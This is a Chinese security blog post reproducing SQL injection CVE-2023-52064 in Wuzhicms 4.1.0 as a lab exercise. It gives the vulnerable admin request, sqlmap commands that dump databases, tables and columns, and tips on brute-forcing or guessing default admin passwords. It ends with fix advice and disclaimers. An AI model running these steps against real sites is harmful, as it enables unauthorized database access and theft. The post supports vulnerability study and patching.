Wuzhicms v4.1.0 SQL注入漏洞(CVE-2023-52064)

admin 2025年4月10日22:18:42评论14 views字数 1514阅读5分2秒阅读模式

微信公众号:【秋风有意染黄花】分享安全学习的心得和笔记。问题与建议,请公众号留言或私信。

前言 

Wuzhicms 是一款基于 PHP 和 MySQL 的开源内容管理系统,支持第三方APP 接入功能。Wuzhicms v4.1.0 存在一个严重的 SQL 注入漏洞(CVE-2023-52064),漏洞被发现于核心文件 /core/admin/copyfrom.php 中的 $keywords 参数。$keywords参数未经过滤或转义,直接拼接到 SQL 查询的 WHERE 子句中,导致 SQL 注入攻击。受影响版本:Wuzhicms 4.1.0 及以下版本。

 实验环境

环境下载:https://github.com/wuzhicms/wuzhicms/releases

安装说明:https://www.wuzhicms.com/doc/2.html

 漏洞复现 

1.搭建实验环境。

a.可以自行下载wuzhicms-4.1.0到本地,搭建到虚拟机中。

b.使用网上的免费靶场,开启CVE-2023-52064靶场环境。

2.访问实验环境,进入登录界面。

如访问:http://127.0.0.1/www/index.php?m=core&v=login&_su=wuzhicms

Wuzhicms v4.1.0 SQL注入漏洞(CVE-2023-52064)

注:a.登录页面,可以通过密码猜测攻击或使用burp suite尝试暴力破解。(自己下载安装的实验环境一般为自己设置账号密码,其他免费靶场可能设置账号密码为admin/admin123或admin/admin等)

b.127.0.0.1需要替换为实际的IP。

3.登录系统,进入主页。

Wuzhicms v4.1.0 SQL注入漏洞(CVE-2023-52064)

4.分析存在问题的文件,wuzhicms-4.1.0wuzhicms-4.1.0coreframeappcoreadmincopyfrom.php

Wuzhicms v4.1.0 SQL注入漏洞(CVE-2023-52064)

5.结合网上已经公开的漏洞信息,构造payload:

GET /www/index.php?m=core&f=copyfrom&v=listing&_su=wuzhicms&_menuid=&keywords=1 HTTP/1.1Host127.0.0.1
Wuzhicms v4.1.0 SQL注入漏洞(CVE-2023-52064)

6.使用Burp Suite抓取该数据包,复制存入2.txt中,再使用sqlmap获取数据库名。

sqlmap -r 2.txt -batch -dbs
Wuzhicms v4.1.0 SQL注入漏洞(CVE-2023-52064)

7.还可以进一步获取表名、字段名、数据,以下为示例(实际以具体的数据库名、表名、字段名为准):

sqlmap -r 2.txt -batch -D wuzhicms --Tablessqlmap -r 2.txt -batch -D wuzhicms -T flllaaaag --columnssqlmap -r 2.txt -batch -D wuzhicms -T flllaaaag -C flag --dump

 漏洞修复

1、更新Wuzhicms 至最新版本。
2、对用户输入参数进行严格的过滤和转义处理,避免直接将用户输入数据拼接到 SQL 查询中。
3、定期对系统进行安全审计和漏洞扫描,及时发现并修复潜在的安全问题。
 总结

回顾以上实验过程,主要是因为Wuzhicms低版本系统未对用户输入$keywords 参数进行严格的过滤导致了SQL注入问题。CVE-2023-52064漏洞为高危漏洞,如果在实际工作环境中存在此漏洞,建议相关系统尽快进行升级修复。

免责声明

我们本着技术分享的原则,分享学习心得和工具掌握,请勿将其用于任何非授权的行为,请严格遵守国家信息安全法。任何违反法律、法规的行为,均与本人无关。建议所有的操作在虚拟机中进行,自己搭建实验环境,安全性自若是有违规的地方,请联系删除。

原文始发于微信公众号(秋风有意染黄花):Wuzhicms v4.1.0 SQL注入漏洞(CVE-2023-52064)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月10日22:18:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Wuzhicms v4.1.0 SQL注入漏洞(CVE-2023-52064)https://cn-sec.com/archives/3887066.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息